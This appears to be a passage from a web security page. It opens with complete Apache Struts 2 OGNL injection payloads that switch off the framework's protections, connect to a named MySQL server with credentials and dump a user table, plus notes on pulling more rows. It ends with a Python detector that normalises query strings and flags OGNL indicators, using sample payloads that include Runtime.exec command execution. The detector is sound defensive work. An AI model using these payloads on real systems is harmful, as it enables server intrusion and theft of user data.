%22%22).append(%22%25%25%25%22).append(\43rs.getString(3)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(4)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(5)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(6)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(7)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(8)%2b%22%22).append(%22%25%25%25%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

The 2nd row is \43rs.next()%2b\43rs.next(), i.e. two of them

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i6)(('\43rs.next()%2b\43rs.next()')(d))&(i95)(('\43xman.getWriter().println(new\40java.lang.StringBuilder().append(\43rs.getString(1)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(2)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(3)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(4)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(5)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(6)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(7)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(8)%2b%22%22).append(%22%25%25%25%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

The 3rd is three.

The 4th is four: \43rs.next()%2b\43rs.next()%2b\43rs.next()%2b\43rs.next()

It seems to top out at a little over 200.
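As an added defensive example (not part of the original page), the Python script below normalizes request query strings through the same escaping layers the payloads above use (percent-encoding, OGNL octal escapes such as `\43` for `#` and `\75` for `=`, and `\u0023`-style unicode escapes) and then flags the markers every payload on this page depends on: `_memberAccess`, `denyMethodExecution`, the `@class@member` static-call syntax, `Runtime.getRuntime`, `ServletActionContext`, `DriverManager`, file I/O classes and the parenthesised parameter-name wrapper. The sample query strings are constructed for the demonstration and are not captured traffic; the indicator names and the coarse categories are this example's own choices. A check like this belongs in a WAF rule or a log review as a compensating control alongside an upgraded Struts 2; normalizing before matching is the part that matters, since any single encoding can be swapped for another.

```python
import re
from urllib.parse import unquote

# Constructed sample query strings, modelled on the escaping conventions of the
# payloads above. These are illustrative inputs, not captured traffic.
SAMPLE_QUERIES = [
    # benign request
    "index.action?request_locale=zh_TW&page=2",
    # OGNL in a parameter name, octal-escaped: \43 is '#', \75 is '='
    "index.action?('\\43_memberAccess.allowStaticMethodAccess')(a)=true"
    "&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))",
    # same idea, unicode-escaped: \u0023 is '#'
    "index.action?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true",
    # static call into Runtime plus a percent-encoded string literal
    "index.action?(h)(('\\43x\\75@java.lang.Runtime@getRuntime().exec("
    "\\43req.getParameter(%22cmd%22))')(d))&cmd=ls",
]

_UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
_OCTAL_ESC = re.compile(r"\\([0-7]{1,3})")

# Indicator names and patterns are this example's own choices (assumption).
INDICATORS = {
    "member_access": re.compile(r"_memberAccess"),
    "deny_method_execution": re.compile(r"denyMethodExecution"),
    "static_call": re.compile(r"@[\w.]+@\w+"),          # OGNL @class@member syntax
    "runtime_exec": re.compile(r"java\.lang\.Runtime@getRuntime"),
    "servlet_context": re.compile(r"ServletActionContext@get(?:Request|Response)"),
    "jdbc_connect": re.compile(r"java\.sql\.DriverManager@getConnection"),
    "file_io": re.compile(r"java\.io\.File(?:Input|Output)?Stream|java\.io\.File@"),
    "paren_param_name": re.compile(r"\(\w+\)\(\('"),     # the (x)(('...')) wrapper
}


def normalize(raw: str) -> str:
    """Undo the layers of escaping so indicators match regardless of encoding."""
    text = unquote(raw)  # %22 -> ", %2F -> /, %5C -> \ and so on
    text = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    text = _OCTAL_ESC.sub(lambda m: chr(int(m.group(1), 8)), text)
    return text


def classify(indicators) -> str:
    """Coarse category chosen by the most consequential indicator present."""
    if "runtime_exec" in indicators:
        return "command-execution"
    if "file_io" in indicators:
        return "file-access"
    if "jdbc_connect" in indicators:
        return "database-access"
    if indicators:
        return "ognl-injection"
    return "benign"


def scan(raw: str) -> dict:
    """Normalize one query string and report which indicators it contains."""
    text = normalize(raw)
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return {"normalized": text, "indicators": hits, "category": classify(hits)}


def scan_all(queries):
    return [scan(q) for q in queries]


if __name__ == "__main__":
    for q, result in zip(SAMPLE_QUERIES, scan_all(SAMPLE_QUERIES)):
        print(f"{result['category']:>18}  {q[:60]}")
        if result["indicators"]:
            print(f"{'':>18}  indicators: {', '.join(result['indicators'])}")
```

Run against access-log query strings in bulk and alert on anything that is not `benign`; the `static_call` indicator alone is a strong signal because the `@class@member` syntax has no legitimate place in a parameter name.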
